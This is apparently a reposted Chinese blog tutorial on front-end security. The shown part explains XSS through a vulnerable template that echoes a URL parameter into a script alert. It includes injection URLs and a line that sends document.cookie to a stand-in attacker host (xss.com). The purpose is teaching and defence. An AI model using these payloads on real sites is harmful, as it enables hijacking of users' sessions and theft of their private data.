前端安全知多少

来源:http://www.cnblogs.com/zhuanzhuanfe/archive/2017/08/04/7286611.html
-Advertisement-
Play Games

說到安全,大家腦海浮現的一定是這種場景。 他們噼噼啪啪敲幾行代碼,就能控制對方電腦於千里之外,酷到沒朋友。 但這些似乎離前端還挺遠的。常常聽到什麼SQL註入,緩衝區溢出,DDoS,CC攻擊,好像和前端也沒啥關係,漸漸的會覺得安全是後端的的事。 但真的是這樣的嗎?想起來前不久公司安全部門統計的漏洞列表 ...


說到安全,大家腦海浮現的一定是這種場景。

他們噼噼啪啪敲幾行代碼,就能控制對方電腦於千里之外,酷到沒朋友。

但這些似乎離前端還挺遠的。常常聽到什麼SQL註入,緩衝區溢出,DDoS,CC攻擊,好像和前端也沒啥關係,漸漸的會覺得安全是後端的的事。

 

但真的是這樣的嗎?想起來前不久公司安全部門統計的漏洞列表

看,前端經典的XSS漏洞占據了90%以上。所以學習和瞭解前端安全方面的知識,還是十分有必要的。

 

接下來我們聊聊前端安全,主要從以下幾塊來講

 

一、XSS攻擊與防禦

二、CSRF攻擊

三、HTTP劫持與對策

四、界面操作劫持

五、防禦手段

 

 


 

一、XSS攻擊與防禦

當年寫過這樣一段代碼,form提交表單後,如果有錯誤,需要前臺alert出來。

偷懶採用瞭如下思路

1、提交表單之後再次重定向到當前頁面,然後把錯誤信息放入url中。

2、controller層把url參數傳入模板。

3、模板部分如果變數有值,就alert出來。

 

代碼大概如下

// 假設提交表單之後定位到這個頁面

// http://www.wrong.com?msg=param-error

 

// 頁面上模板上,為了省心,有這麼一段

<script>

   // … 省略一些代碼,{{}} 是模板引擎引入變數的語法

   alert('{{query.msg}}');

</script>

 

乍一看,這麼寫沒什麼問題。{{query.msg}}會被替換成 param-error。模板被解析成html的時候,會變為alert('param-error’);

 

但是,如果有人不懷好意,訪問這樣一個url

http://www.wrong.com?msg=');alert(document.cookie);('

然後代碼就變成了

alert('');alert(document.cookie);('');

訪問這個頁面,彈出了cookie。

 

當然,彈出cookie沒有太多價值,但如果我們把代碼改成

new Image().src = 'http://www.xss.com?data=' + document.cookie;

 

這樣,我們就把目標用戶的cookie發送到我們的伺服器上了。而cookie中極有可能存在用戶的隱私數據甚至是用戶的登錄session。

 

當然,這隻是一個最簡單的例子,用來說明攻擊的原理。實際情況下,我們會遇到很多限制,比如瀏覽器的自動轉碼,cookie的only http標識等。

 

XSS的攻擊有很多種方式,通常情況下,我們會對XSS攻擊做如下分類

1、反射型XSS

發請求時,XSS代碼出現在URL中,提交給服務端。服務端返回的內容,也帶上了這段XSS代碼。最後瀏覽器執行XSS代碼。

通常情況是攻擊者找到有XSS漏洞的網站,然後構造一個連接,就像這種

http://www.hasxss.com?x=<script>alert(document.cookie)</script>

帶有攻擊效果的鏈接

然後誘導你點擊

通常他們會把鏈接短鏈一下迷惑你,就好比

http://dwz.cn/woshiduanwangzhi

PS:通常還會加上一句類似 ~你們看看王寶強兒子長得像誰~ 這種標題

您的分享是我們最大的動力!

-Advertisement-
Play Games
更多相關文章
  • 近幾年旅游市場高速增長,數據量越來越大,並且會持續快速增長。有越來越多的使用需求,對系統的實時性,穩定性也提出了更高的要求。總的來說,當前需求對系統的實時性/可用性/性能/擴展性方面都有很高的要求。 ...
  • 移動端click事件300ms延遲 移動端click事件300ms的延遲在目前看來,已經是老生常談了。 以下內容,我會在參考資源的基礎上談談我對移動端click事件300ms延遲的一些理解。本人愚昧,如有不足,望瀏覽指正。 300ms延遲的原因 參考資源有談到,300ms延遲是因為瀏覽器要判斷用戶的 ...
  • “T”結構佈局形式。所謂“T”結構,就是指頁面頂部為橫條網站標誌+廣告條,下方左面為主菜單,右面顯示內容的佈局,整體效果類似英文字母“T”,所以稱之為“T,形佈局。這是網頁設計中用得最廣泛的一種佈局方式。這種佈局的優點是頁面結構清晰,主次分明,是初學者最容易上手的佈局方法。缺點是規矩呆板,如果不註意 ...
  • 在我沒有講什麼是變數提升,以及變數提升的規則之前, 或者你沒有學習過變數提升,如果按照現有的javascript理解, 對於上述的例子,你可能會認為第3行代碼的輸出結果應該是undefined, 因為第二行是var a; 聲明變數,但是沒有賦值,所以a的值是undefined, 但是正確的結果是gh ...
  • 前言 大歡哥的題目完成了,但是衍生出一個新的問題!上篇隨筆中我和大歡哥採用的隨機數生成方式,到底是誰的比較公平??? 正文 歡迎來到阿段博客《奇思妙想》!我們的口號是 “心有多大,bug就有多大”! 下麵介紹我們的嘉賓: 小鵬哥,小鵬哥來自xxxxxx,取得xxxxxx(一堆頭銜)。前端老司機。大家 ...
  • 前言 技術經理(以下簡稱“大歡哥”,因為大歡哥人高馬大的)一日出差回來,在樓下休息聽到 “今日頭條” 的前端網面(頭條就在我們公司隔壁。公司樓下有休息區,可以坐那喝咖啡)。兩個javaScript題目。 今天早上來上班,包還沒放下,就一臉神秘的對我說 “ 我這聽到 頭條的前端面試題,等我吃完飯回來給 ...
  • 選擇類Ctrl+D 選中游標所占的文本,繼續操作則會選中下一個相同的文本。Alt+F3 選中文本按下快捷鍵,即可一次性選擇全部的相同文本進行同時編輯。舉個慄子:快速選中並更改所有相同的變數名、函數名等。Ctrl+L 選中整行,繼續操作則繼續選擇下一行,效果和 Shift+↓ 效果一樣。Ctrl+Sh ...
  • 一直使用jQuery的hover()函數來寫滑鼠經過事件,這幾天發現其他同行直接使用CSS就搞定了。自己線上下也試了試: 當然也並不是沒有前提條件,需要配合一些定位屬性來使用(position/top/left)。代碼如下: <!DOCTYPE html> <html lang="en"> <hea ...
一周排行
    -Advertisement-
    Play Games
  • 移動開發(一):使用.NET MAUI開發第一個安卓APP 對於工作多年的C#程式員來說,近來想嘗試開發一款安卓APP,考慮了很久最終選擇使用.NET MAUI這個微軟官方的框架來嘗試體驗開發安卓APP,畢竟是使用Visual Studio開發工具,使用起來也比較的順手,結合微軟官方的教程進行了安卓 ...
  • 前言 QuestPDF 是一個開源 .NET 庫,用於生成 PDF 文檔。使用了C# Fluent API方式可簡化開發、減少錯誤並提高工作效率。利用它可以輕鬆生成 PDF 報告、發票、導出文件等。 項目介紹 QuestPDF 是一個革命性的開源 .NET 庫,它徹底改變了我們生成 PDF 文檔的方 ...
  • 項目地址 項目後端地址: https://github.com/ZyPLJ/ZYTteeHole 項目前端頁面地址: ZyPLJ/TreeHoleVue (github.com) https://github.com/ZyPLJ/TreeHoleVue 目前項目測試訪問地址: http://tree ...
  • 話不多說,直接開乾 一.下載 1.官方鏈接下載: https://www.microsoft.com/zh-cn/sql-server/sql-server-downloads 2.在下載目錄中找到下麵這個小的安裝包 SQL2022-SSEI-Dev.exe,運行開始下載SQL server; 二. ...
  • 前言 隨著物聯網(IoT)技術的迅猛發展,MQTT(消息隊列遙測傳輸)協議憑藉其輕量級和高效性,已成為眾多物聯網應用的首選通信標準。 MQTTnet 作為一個高性能的 .NET 開源庫,為 .NET 平臺上的 MQTT 客戶端與伺服器開發提供了強大的支持。 本文將全面介紹 MQTTnet 的核心功能 ...
  • Serilog支持多種接收器用於日誌存儲,增強器用於添加屬性,LogContext管理動態屬性,支持多種輸出格式包括純文本、JSON及ExpressionTemplate。還提供了自定義格式化選項,適用於不同需求。 ...
  • 目錄簡介獲取 HTML 文檔解析 HTML 文檔測試參考文章 簡介 動態內容網站使用 JavaScript 腳本動態檢索和渲染數據,爬取信息時需要模擬瀏覽器行為,否則獲取到的源碼基本是空的。 本文使用的爬取步驟如下: 使用 Selenium 獲取渲染後的 HTML 文檔 使用 HtmlAgility ...
  • 1.前言 什麼是熱更新 游戲或者軟體更新時,無需重新下載客戶端進行安裝,而是在應用程式啟動的情況下,在內部進行資源或者代碼更新 Unity目前常用熱更新解決方案 HybridCLR,Xlua,ILRuntime等 Unity目前常用資源管理解決方案 AssetBundles,Addressable, ...
  • 本文章主要是在C# ASP.NET Core Web API框架實現向手機發送驗證碼簡訊功能。這裡我選擇是一個互億無線簡訊驗證碼平臺,其實像阿裡雲,騰訊雲上面也可以。 首先我們先去 互億無線 https://www.ihuyi.com/api/sms.html 去註冊一個賬號 註冊完成賬號後,它會送 ...
  • 通過以下方式可以高效,並保證數據同步的可靠性 1.API設計 使用RESTful設計,確保API端點明確,並使用適當的HTTP方法(如POST用於創建,PUT用於更新)。 設計清晰的請求和響應模型,以確保客戶端能夠理解預期格式。 2.數據驗證 在伺服器端進行嚴格的數據驗證,確保接收到的數據符合預期格 ...